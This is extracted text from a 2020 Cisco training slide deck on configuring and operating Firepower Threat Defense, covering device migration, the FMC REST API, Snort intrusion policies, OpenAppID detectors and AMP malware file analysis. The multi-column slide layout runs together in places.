• CDO Cloud
• Staging platform
• Stores settings, processing, writes all changes
• Push the changes
• Never talk to the customer's devices directly
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 193
Secure Device Connector (SDC)
Cloud SDC
• 35.157.12.126
• 35.157.12.15
• https://defenseorchestrator.com
• 52.34.234.2
• 52.36.70.147 Cloud SDC
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 194
Secure Device Connector (SDC)
On-Premises SDC
On-Premise SDC
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 195
For Your
Software and Hardware Supported by CDO Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 200
Automatically Accept Out-of-Band Changes
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 201
Change Log
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 203
FTD Upgrade Prerequisites
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 205
Security Analytics and Logging (SAL) - Overview
• Capture connection, intrusion, file, malware, and Security Intelligence events from
FTD devices and view them in CDO
• Events are stored in the Cisco cloud and viewable from the Event Logging page in
CDO
• Optional: Stealthwatch Cloud can
apply dynamic entity modeling Stealthwatch
Cloud
to your FTD events to generate Cisco
NTD
Service
SDC FTD 6.4 SDC (on-prem VM)
SEC is required. It has two
containers (SDC & SEC)
FTD 6.5 can send events
directly to the Cisco cloud
FTD
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 207
For Your
SAL – Installation / Configuration Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 208
Break – 15 Minutes
FMC Migration
via Backup and Restore
Firepower Management Center Model Migration
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 211
For Your
Supported Migration Paths Reference
FMCv AWS FMC 1600 FMC 2600 FMC 4600 FMCv 300
AWS Yes — Yes Yes Yes Yes
FMCv 25 — Yes Yes Yes Yes Yes
FMC 1000 — — Yes Yes Yes Yes
FMC 1600 — — — Yes Yes Yes
FMC 2000 — — — Yes Yes Yes
FMC 2500 — — — Yes Yes Yes
FMC 2600 — — — — Yes Yes
FMCv 300 — — — Yes Yes —
FMC 4000 — — — — Yes —
FMC 4500 — — — — Yes —
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 212
FMC Migration Procedure
1 3 6 7
Copy the Unregister
Source FMC Disconnect
Create a generated Smart
FMC from
backup file backup file Software
network
to target Manager
2 4 5 8 9
Target FMC Disconnect Execute Connect Enable
Set up the
FMC from migration FMC to the smart
target FMC
network script network licensing
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 213
For Your
Guidelines and Limitations Reference
• If you change the FMC IP after migration, must also update the NAT configuration
between the FMC and its managed devices (for more information, see NAT Environments)
• All FMC licensing modes and High Availability setup‘s are supported - evaluation,
connected and SLR
• Must de-register licenses from the source FMC and register licenses in the target
FMC after migration
• Ensure that the target FMC has the same number of interfaces as source FMC
• Verify that the target FMC version matches the source FMC version (including patch,
VDB, and SRU)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 214
FTD
Backup and Restore
Backup and Restore Capabilities
• KVM, AWS, Azure, clustered Devices and Container instances are not supported!
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 216
For Your
Backup file format & Backup Information File Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 220
CLI – restore remote-manager-backup
***********************************************
Backup Details
***********************************************
Model = Cisco Firepower 2130 Threat Defense
Software Version = 6.3.0
Serial = JAD211800XX
Hostname = FTD-IFT
IP Address = 10.62.148.185
VDB Version = 299
SRU Version = 2018-08-23-001-vrt
Manager IP(s) = 10.62.148.207
Backup Date = 2019-02-14 12:41:49
Backup Filename = FTD-IFT_20190214124149.tar
***********************************************
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 221
Device RMA
Demo
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
FTD Migration
Migration Tool Paths
Stateful Firewall to NGFW
managed by
FDM
CDO FMT service
• Check Point OS
• Versions: R75, R76, R77, R77.10, R77.20, and R77.30
• Platform: Windows, Secure Platform, Secure Platform 2.6,Solaris, Linux, Gaia
• Supported FMC Versions: 6.2.3.3 or later
FTD
Config Extract Device Setup Pre Tool Execution During Execution Post Migration Finish Migration
• Use the latest • Bootstrap the • Download the • Shutdown the • Review the Post • Deploy/Apply the
config file from Target Device latest build of tool source device Migration Report Cofiguration to
source device interfaces device
• Setup • Enable Cisco • Login to FMC to
• Review what is Management Success • Clear arp from verify migrated • Save Post-
supported by the Access and Telemetry connected Layer config Migration report as
tool and what connect to 2/3 infra future refrrence as
• Do not make • Migrate VPN using
needs to be Manager of Day 0 config fille
changes on the • Review the reports Migration Guides
manually Choice
management generated during • Perform
migrated • Review Pre
• Enable platform of target pre and post connectivity test to
Migration report
• Optimize the Licensing device migration ensure traffic flow
and manually
config*
• Setup Interfaces • Create an user • Carefully map the migrate the
• Choose the mapping with account with interfaces remaining relevant
manager of source device admin privellage config
• Use Build in
Choice for migration on
• Configure Optmizations like
management
Platform Do Not Migrate
platform
Settings
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 228
ASA Configurations
• Supports the "show tech-support" command in the manual upload method for
Multiple-Context ASA
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 229
For Your
Supported Check Point configuration Reference
• Interfaces
• Static Routes
Firepower 4
Management
Log in to Automatic Map
Center the FMC
Manual Map
5 6 7 8 9
Fetch
Fetch FMC
Global Fetch FTD Fetch FMC Fetch FMC
Interface
Domain Details Interfaces Zones
Groups
Details
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 235
Firepower
Migration Tool –
Desktop Edition
Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 237
REST API
Overview
REST API Basics
"kind": "object#NetworkObj",
• Uses JSON as the interface, JavaScript "name": "Demo_NObj_1190",
Object Notation }
"objectId": "Demo_NObj_1190"
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 242
Request Structure
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 243
REST API from FMC 6.1
Managed
Devices
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 244
Supported Features in FMC 6.1
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 249
Best Practices
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 250
API Explorer
Free tool built into the FMC that can be used to use the REST API
• https://<FMC_IP_or_name>:<https_port>/api/api-explorer
Specification in
JSON
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 253
Preloaded
parameters
Execute a test
request
Detailed response
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Token based Authentication REST Client REST API
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 256
Request and Response Format
Access Control Policy
For example, for bulk, if it is
supported: bulk=true
• Request format:
https://{host}:{port}/{object_url}/{object_uuid}?{options}
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 259
API Examples
Python scripts are available in
the “Codes” folder!
Demo:
Why Do We Need
Bulk Method?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 266
Demo:
Add 100’s
interfaces to FTD
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 268
Demo:
Managing
Office365
Exclusions
Managing Office365 Exclusions
• Microsoft Office site for exclusions • Version checking and the script can be
(IPs, URLs) -> Parser script -> FMC scheduled
Objects
• Selectable regions: Worldwide,
• Database access: Germany (Europe), USGovDoD, China
• https://endpoints.office.com/endpoints/Germany?
ClientRequestId=d8... • Selectable services: Exchange,
[ SharePoint, Skype
{
"id": 1,
"serviceArea": "Exchange", • More information:
"serviceAreaDisplayName": "Exchange Online",
"urls": [ "outlook.office.de" ], • https://www.youtube.com/watch?v=nY9nW
"ips": [ VrgO4I
"51.4.64.0/23",
"51.5.64.0/23" • https://github.com/chrivand/Firepower_O3
], 65_Feed_Parser
"tcpPorts": "80,443",
"expressRoute": false,
"category": "Optimize", More information: Protecting your Office 365 environment:
"required": true }, leverage the Firepower API, Cisco Cloud Email Security
} and more. - BRKSEC-3433
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 274
For Your
DEVNET, 12 FMC REST API Labs Reference
• https://learninglabs.cisco.com/labs/tags/Coding,Python/page/1
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 275
For Your
DEVNET, Security Express Reference
• https://learninglabs.cisco.com/tracks/devnet-express-security
• https://dcloud2-lon.cisco.com/content/demo/304193
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 276
For Your
Additional REST API Examples Reference
• http://cs.co/ats-apis
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 277
Deployment and
Interface Modes
FTD Deployment and Interface Modes
• 2 Deployment Modes:
• Routed
Device Modes inherited from ASA
• Transparent
• 6 Interface Modes
• Routed Regular Firewall Modes - Interface Modes
inherited from ASA
• Bridged
• Passive
• Passive (ERSPAN) IPS-only Modes - Interface Modes
• Inline Pair inherited from Firepower
• Inline Pair with Tap
• Interface modes can be mixed on a single FTD device
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 279
FTD Deployment Modes
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 280
Routed Firewall Mode
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 281
Transparent Firewall Mode
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 282
Integrated Routing and Bridging (IRB)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 283
Firepower 1010 Ports and Interfaces
FTD 6.5 and ASA 9.13(1) release
10.1.4.0/24
• Physical interfaces can be configured as a Routed
firewall or as a switch port interfaces
Internet A Eth 1/1 Eth 1/5 E
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 286
Firepower 1010 Ports and Interfaces
• Access ports accept only untagged traffic, assign them to a single VLAN
• Trunk ports accept untagged and tagged traffic, can belong to more than one VLAN
• By default, Ethernet 1/2 through 1/8 are configured as access switch ports on VLAN
1, Ethernet 1/1 interface is configured as a firewall interface
• Unfiltered port-to-port forwarding with Switched Virtual Interface (SVI)
• No dynamic routing, EtherChannel, or HA/failover monitored interfaces
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 287
NGFW Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Update Flow
with Verdict
New flow Flow
Flow Creation Application
Database Inspection
Route and Flow
Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
TCP Normalizer
Main Access
QoS
L4 Decode Policy
Existing
RX TX
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
IPS-only Interface Modes
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 289
IPS-only Interface modes - Passive Mode
D H
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 290
IPS-only Interface modes - Inline Pair Mode
• Physical interfaces
• EtherChannel (Firepower 4100/9300) A Routed/Transparent E
• True pass-through mode for VLANs Policies
B F
• Data Plane tracks connections for
HA/Clustering C G
• Supported in intra-chassis and inter- Inline Pair 1
D H
chassis clustering VLAN 10 VLAN 10
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 291
IPS-only Interface modes - Inline Set
C Inline Pair 1 G
Inline Set
Inline Pair 2
D H VLAN 10
VLAN 10
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 292
IPS-only Interface modes - Inline Tap
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 293
NGIPS Packet Flow
Advanced IP
NAT Lookup
ACL Match Datapath
Act Upon
Verdict
New flow Flow
Lightweight Application
Flow Creation Database Inspection
Flow Lookup
Cluster Flow Network File/AMP Policy-Based
NGIPS
Redirect Discovery Processing Routing
VPN Decrypt
Existing
Network NAT Translate
TCP Intercept Analysis Policy
Lightweight
State Tracking
Main Access
QoS
L4 Decode Policy
Existing
RX TX
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Application
Visibility and
Control (AVC)
Application Visibility and Control
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 297
OpenAppID Overview
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 298
Access Control Policy
Adding Application Control Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 299
Access Control Policy
Adding Application Control Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 300
Types of Custom Detectors
• Basic
• FMC creates Lua script after administrator describes application in a Wizard
• Limited to specific combinations of port matching, string matching, and protocol
• Advanced
• Administrator creates and uploads custom Lua script
• Unleashes the power of Lua
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 301
For Your
Example of a Lua Script Reference
--[[
detection_name: SampleAppDetector function DetectorInit(detectorInstance)
version: 1 gDetector = detectorInstance;
description: gAppId =
Detects "cisco123" on port 8888 gDetector:open_createApp("SampleApp");
--]] if gDetector.addPortPatternService then
gDetector:addPortPatternService(proto,
require "DetectorCommon" 8888,"cisco123",-1,gAppId);
local DC = DetectorCommon end
local proto = DC.ipproto.tcp; end
DetectorPackageInfo = {
name = "SampleAppDetector", function DetectorValidator()
proto = proto, end
server = {
init = 'DetectorInit', function DetectorClean()
validate = 'DetectorValidator', end
clean = 'DetectorClean',
minimum_matches = 1
}
}
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 302
OpenAppID within Firepower
Creating the Basic Custom Detector
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 303
OpenAppID within Firepower (cont.)
Creating the Basic Custom Detector
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 304
For Your
OpenAppID within Firepower (cont.) Reference
Specify Category
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 305
For Your
OpenAppID within Firepower (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 306
For Your
OpenAppID within Firepower (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 307
For Your
OpenAppID within Firepower (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 308
OpenAppID within Firepower (cont.)
Creating the Basic Custom Detector
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 310
OpenAppID within Firepower (cont.)
Creating the Custom Detector
You can find your Application Detector The new Application Detector will not function
by selecting Custom Type in the Filters until it is Activated by clicking on the State slider
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 311
OpenAppID within Firepower (cont.)
Creating the Custom Detector
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 312
OpenAppID within Firepower
Adding Rule in the Access Control Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 313
OpenAppID within Firepower
Access Control Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 314
Preprocessors
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 316
System Provided Network Analysis Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 317
Network Analysis Policy
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Network Analysis Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 319
Network Analysis Policy (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 320
Network Analysis Policy (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 321
Network Analysis Policy (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 322
Network Analysis Policy (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 323
Network Analysis Policy (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 324
Next Generation
Intrusion Prevention
System (IPS)
Next Generation IPS Policy Overview
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 326
System Provided Base IPS Policies
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 327
System Provided Base IPS Policies
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 328
System Provided Base IPS Policies
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 329
System Provided Base IPS Policies
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 330
System Provided Base IPS Policies
• No Rules Active
• Often used if planning to use Firepower
Recommendations to turn rules on based
on your environment
• Problem - no longer have the advantage
of Talos’ input for the new rules
• The best practice is to start with Security
Over Connectivity (or Balanced) and use
the recommendations to adjust these in a
layer
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 331
Snort Rule Updates
• Cisco TALOS provides regular rule updates, and these are typically automatically
updated
• The rules provided in a Snort Rule Update (SRU) package are created and tested by
the Cisco Talos Security Intelligence and Research Group
Uncheck to
prevent/control automatic
rule installation
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 332
For Your
Intrusion Policy Rules Reference
How to search for rules included in SRU updates?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 333
For Your
Intrusion Policy Rules (cont.) Reference
Different rule categories
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 334
For Your
Intrusion Policy Rules (cont.) Reference
Several ways to search for rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 335
For Your
Intrusion Policy Rules (cont.) Reference
Several ways to search for rules: Platform specific
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 336
For Your
Intrusion Policy Rules (cont.) Reference
Several ways to search for rules: Microsoft vulnerabilities
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 337
Importing Snort Rules
• The Import file can contain many rules as long as they are one rule per-line
Import Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 338
Importing Snort Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 339
Importing Snort Rules
• If successful, you will see a screen showing what has been imported
• If unsuccessful, the Rule Update Log will tell you what was wrong with the file
SID >1.000.000
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 340
Enabling Snort Rules
• All imported rules are disabled by default, you need to enable them
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 341
Snort Language
Overview
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 342
Snort Language
Sample rule
Variables
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 343
Variable Sets
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 344
Multiple definitions for Variable Set
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 345
Variable Sets and Intrusion Policies
• Associated to intrusion policies in Access Control Policy rules or with the default
action of an access control policy
• For protecting a different networks use custom IPS policy for each network
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 346
Network Discovery Policy
• The Network Discovery Policy is used to identify for which networks Firepower
should perform passive discovery and build Host Profiles
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 347
Host Profile
• XML file associated with a particular IP address
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 348
Network Discovery Policy
Advanced Settings
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 349
Network Discovery Policy
Advanced Settings
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 350
Firepower Recommended rules
• Firepower Recommendations makes sure your system has the right detections
enabled which are relevant to your specific network
• Automatically tunes your Snort rules for the applications, servers, and hosts on your
network
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 351
Firepower Recommended Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 352
Firepower Recommended Rules (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 353
For Your
Firepower Recommended Rules (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 354
For Your
Firepower Recommended Rules (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 355
Firepower Recommended Rules (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 356
Firepower Recommended Rules (cont.)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 357
Impact Assessment
How Relevant is the Attack ?
Neither the Source or Destination IP address is within the range General info* Event outside Event occurred outside profiled
0
of your IP addresses profiled networks networks
IP address of a host in within the defined IP range of your Good to Know, Unknown Monitored network, but unknown
4
network, but no current host profile for the device Target host
IP address of a host in within the defined IP range of your Good to Know, Currently Relevant port not open or protocol
3
network, but no connection was made Not Vulnerable not in use
IP address of a host in within the defined IP range of your Investigate, Potentially Relevant port open or protocol in
2
network, and connection was made to a working service Vulnerable use, but no vulnerability mapped
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 358
IPS Policy Architecture
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 359
IPS Policy Architecture
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 360
IPS Policy in Access Control Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 361
Operational
Insights
Correlation Policy
• Respond in real time to threats and network traffic deviates from its normal profile
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 363
Correlating Event Data
Flow and connection Data from User Table Data from Host Profiles
conditions over time or (name, group info, etc)
volume
When a… Add Connection Tracker Add User Qualification Add Host Profile Qualification
Intrusion Event ✔ ✔ ✔
Discovery Event ✔ ✔ ✔
Connection Event ✔ ✔ ✔
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 364
For Your
Correlation Rule configuration Reference
Overview
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 365
Correlation Policy Responses
Correlation Policy
Correlation Correlation Email
Rule Event
Syslog
Correlation
Rule
Action SNMP
Remediation Module
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 366
Remediation modules
Overview
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 367
Implementing Remediations
• You can create multiple instances per module, where each instance is configured
differently
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 368
For Your
Implementing Remediations (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 369
For Your
Implementing Remediations (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 370
For Your
Implementing Remediations (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 371
For Your
Correlation Policy Example Reference
Production Network Change
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 372
For Your
Correlation Policy Example (cont.) Reference
Production Network Change
Create Policy
Add Rules
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 373
For Your
Correlation Policy Example (cont.) Reference
Production Network Change
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 374
For Your
Correlation Policy Example (cont.) Reference
Responses
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 375
For Your
Correlation Policy Example (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 376
For Your
Correlation Policy Example (cont.) Reference
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 377
Are You Hungry?
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 396
Lunch – 1 Hour 45 Minutes
AMP for Networks
AMP for Networks - Basics
• Can detect, track, store, analyze, and optionally block the transmission of malware
and all files of a specific type (regardless of whether the files contain malware) in
network traffic
• Created File policies and associated with access control rules handle network traffic
that matches the rules
• Files detected in traffic can be captured and run local dynamic analysis and/or
submit files to the AMP Threat Grid cloud or appliance to determine whether the files
represent malware
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 399
AMP for Networks - Inspection Path
Datapath - RX
incoming packet
AMP in the network
Rule 1: Monitor
inspection Path
matching traffic cont.
no match
Datapath -
Rule 3: Block no inspection TX
no match
no match
Inspection Engines
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
File/AMP Processing
Actions on a File Rule
Rule Actions
File Type Control Malware Analysis
on a File Policy
Malware Block
Detect Files Block Files
Cloud Lookup Malware
Local Malware
Files Analysis
Files can be stored, regardless
of Malware Disposition Dynamic Analysis
Managed devices monitor network traffic for transmissions of certain file type
Y public / private
File size > limit? Stop file capture
AMP Cloud
N
N
Entire File Seen?
Y
FMC
Calc SHA256 Analysis Engine Cache lookup
Y Malware Event
File is Malware?
and Block
N
N Y No further
File was captured? File is Clean? end
processing
Y
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 402
For Your
Order of Processing Malware Analysis – 2 Reference
Y
Inspect archive? Extract contents Uninspectable archive
N
Y
Store files? Capture file
N
Y Y public / private
Spero? Spero Supported File Compute spero hash
AMP Cloud
N
ClamAV
Y Y
Local Malware Analysis? Office, pdf, exe? Pre-class + High
Fidelity Scan
N
Y ClamAV Y public / private
Dynamic Analysis? File Submission
Pre-class Flagged Threat Grid
N
File Event Capacity Handling()
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 403
Local Malware Analysis
CL_TYPE_EXE, EXE_PACKED,
public / private
CL_TYPE_UNKNOWN, EXE_PARSER_FAILURE, Threat Grid
CONTAINS_EMBEDDED_EXE, JSON_INACTIVE,
CONTAINS_EMBEDDED_HTML, OLE_MACRO,
No further
processing
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 408
Local Malware Analysis Files on Disk (CLI)
• Required signature data files, which Clam analysis engine uses for pre-classification
and for static analysis
> expert
admin@gate2:~$ sudo su
Password:
root@gate2:/var/sf/clamupd_download# ls -l *.cvd
-rw-r--r-- 1 root root 4643591 Jan 16 16:35 hifistatic.cvd
-rw-r--r-- 1 root root 45011 Dec 5 15:58 preclass.cvd
• NOTE: If “Enable Automatic Local Malware Detection Updates” is enabled, Firepower
Management Center checks for signature updates once every 30 minutes
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 409
Dynamic Analysis aka Threat Grid
Unified malware analysis and threat intelligence platform
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 410
Threat Grid Supported File Types
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 411
Workflows for Public Cloud
Step by step workflows taken during malware detection
3. Reputation returned:
• If Clean – File Download Completed
• If Malicious – File Download Dropped 2 3 6 4
• If Unknown – File Copied for preclassification (ClamAV) and
Download completes
1
4. If supported, File is sent to Threat Grid for Analysis FMC 3 FTD
6
5. Threat Score passed to AMP Cloud (Poke) NOTE: In deployment scenarios where the
devices communicate with the TG cloud, the
6. AMP Cloud generates a disposition and sends this to FMC UUID is used to know which FMC should
the AMP Connector (PING2) via FMC receive the return data
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 412
File Policies
Part of the overall Access Control configuration
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 418
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 419
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 420
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 421
File Policy Configuration If two or more rules match for the same file type:
1. Block Files
2. Block Malware
3. Malware Cloud Lookup
